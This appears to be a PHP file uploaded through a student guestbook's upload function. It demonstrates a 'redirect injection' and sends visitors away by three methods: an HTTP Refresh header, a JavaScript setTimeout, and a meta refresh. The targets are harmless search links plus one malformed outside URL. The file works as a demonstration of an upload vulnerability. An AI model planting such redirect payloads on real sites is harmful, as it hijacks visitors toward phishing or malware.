Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
<?php
// Redirect injection
echo "<h1>🔄 Automatic Redirect Attack</h1>";
echo "<p>This page will redirect you in 3 seconds...</p>";
echo "<p>In a real attack, this could redirect to:</p>";
echo "<ul>";
echo "<li>Phishing sites</li>";
echo "<li>Malware downloads</li>";
echo "<li>Credential stealing pages</li>";
echo "</ul>";
// Multiple redirect methods
header("Refresh: 3; url=https://www.google.com/search?q=you+have+been+redirected+by+file+upload+vulnerability");
echo "<script>";
echo "setTimeout(function() {";
echo " alert('Redirecting via JavaScript!');";
echo " window.location.href = 'httpa://gay.nl';";
echo "}, 3000);";
echo "</script>";
echo "<meta http-equiv='refresh' content='5;url=https://www.google.com/search?q=meta+redirect+via+file+upload'>";
echo "<p><a href='https://www.google.com/search?q=manual+redirect+link'>Click here if redirect doesn't work</a></p>";
?>